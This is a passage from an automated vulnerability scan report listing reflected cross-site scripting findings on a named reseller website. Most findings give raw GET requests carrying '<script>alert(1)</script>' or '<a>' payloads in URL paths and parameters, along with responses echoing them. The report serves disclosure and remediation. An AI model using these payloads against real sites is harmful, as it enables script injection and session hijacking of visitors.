Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildd2dd<script>alert(1)</script>ca324181367/9/netapplications-com.html was not found on this server.</p>
...[SNIP]...

2.3733. http://www.resellerbase.com/detail/9/netapplications-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/netapplications-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b45b<a>857e4aeead7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/91b45b<a>857e4aeead7/netapplications-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/91b45b<a>857e4aeead7/netapplications-com.html was not found on this server.</p>
...[SNIP]...

2.3734. http://www.resellerbase.com/detail/9/netapplications-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/netapplications-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b868f<script>alert(1)</script>299344ead43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/b868f<script>alert(1)</script>299344ead43 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/b868f<script>alert(1)</script>299344ead43 was not found on this server.</p>
...[SNIP]...

2.3735. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac0fe<script>alert(1)</script>a6ea3912451a56443 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailac0fe<script>alert(1)</script>a6ea3912451a56443/9/rating.php?id=9&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailac0fe<script>alert(1)</script>a6ea3912451a56443/9/rating.php?id=9&rating=5 was not found on this server.</p>
...[SNIP]...

2.3736. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1bc2<script>alert(1)</script>3634e727579 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf1bc2<script>alert(1)</script>3634e727579/9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf1bc2<script>alert(1)</script>3634e727579/9/rating.php was not found on this server.</p>
...[SNIP]...

2.3737. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ed370<script>alert(1)</script>82fc284e36f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9ed370<script>alert(1)</script>82fc284e36f/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9ed370<script>alert(1)</script>82fc284e36f/rating.php was not found on this server.</p>
...[SNIP]...

2.3738. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8118<script>alert(1)</script>1dd3701b1ce742b2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/9a8118<script>alert(1)</script>1dd3701b1ce742b2e/rating.php?id=9&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9a8118<script>alert(1)</script>1dd3701b1ce742b2e/rating.php?id=9&rating=5 was not found on this server.</p>
...[SNIP]...

2.3739. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 381ab<script>alert(1)</script>a3bb958f6c060ce75 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/9/rating.php381ab<script>alert(1)</script>a3bb958f6c060ce75?id=9&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/rating.php381ab<script>alert(1)</script>a3bb958f6c060ce75?id=9&rating=5 was not found on this server.</p>
...[SNIP]...

2.3740. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81429<script>alert(1)</script>b8575554e52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/rating.php81429<script>alert(1)</script>b8575554e52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/rating.php81429<script>alert(1)</script>b8575554e52 was not found on this server.</p>
...[SNIP]...

2.3741. http://www.resellerbase.com/detail/9/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 55ffd<script>alert(1)</script>88e80f7029fc4c6a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/9/rating.php/55ffd<script>alert(1)</script>88e80f7029fc4c6a9?id=9&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/rating.php/55ffd<script>alert(1)</script>88e80f7029fc4c6a9?id=9&rating=5 was not found on this server.</p>
...[SNIP]...

2.3742. http://www.resellerbase.com/detail/9/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6e67a<script>alert(1)</script>9af46a21c68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/rating.php?6e67a<script>alert(1)</script>9af46a21c68=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/rating.php?6e67a<script>alert(1)</script>9af46a21c68=1 was not found on this server.</p>
...[SNIP]...

2.3743. http://www.resellerbase.com/detail/9/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dde52<script>alert(1)</script>b87e5cf825a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildde52<script>alert(1)</script>b87e5cf825a/9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildde52<script>alert(1)</script>b87e5cf825a/9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3744. http://www.resellerbase.com/detail/9/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 861f6<script>alert(1)</script>e16ff7ecdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9861f6<script>alert(1)</script>e16ff7ecdbc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9861f6<script>alert(1)</script>e16ff7ecdbc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3745. http://www.resellerbase.com/detail/9/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2d744<script>alert(1)</script>4f5204db142 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/search.php2d744<script>alert(1)</script>4f5204db142?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php2d744<script>alert(1)</script>4f5204db142?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3746. http://www.resellerbase.com/detail/9/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4764c<a>d26447fc576 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/search.php?keyword=search...&Submit3=Search4764c<a>d26447fc576&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php?keyword=search...&Submit3=Search4764c<a>d26447fc576&opt=2 was not found on this server.</p>
...[SNIP]...

2.3747. http://www.resellerbase.com/detail/9/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eb80c<a>8b599f24116 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/search.php?keyword=search...eb80c<a>8b599f24116&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php?keyword=search...eb80c<a>8b599f24116&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3748. http://www.resellerbase.com/detail/9/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af1af<script>alert(1)</script>c7732166311 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/search.php?keyword=search...&Submit3=Search&opt=2&af1af<script>alert(1)</script>c7732166311=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php?keyword=search...&Submit3=Search&opt=2&af1af<script>alert(1)</script>c7732166311=1 was not found on this server.</p>
...[SNIP]...

2.3749. http://www.resellerbase.com/detail/9/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 14353<a>e0156cc33d8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/search.php?keyword=search...&Submit3=Search&opt=214353<a>e0156cc33d8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php?keyword=search...&Submit3=Search&opt=214353<a>e0156cc33d8 was not found on this server.</p>
...[SNIP]...

2.3750. http://www.resellerbase.com/detail/9/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3f0ff<script>alert(1)</script>5421184882d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3f0ff<script>alert(1)</script>5421184882d/9/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3f0ff<script>alert(1)</script>5421184882d/9/themes/ was not found on this server.</p>
...[SNIP]...

2.3751. http://www.resellerbase.com/detail/9/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 44966<script>alert(1)</script>5f0f1769aa3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/944966<script>alert(1)</script>5f0f1769aa3/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
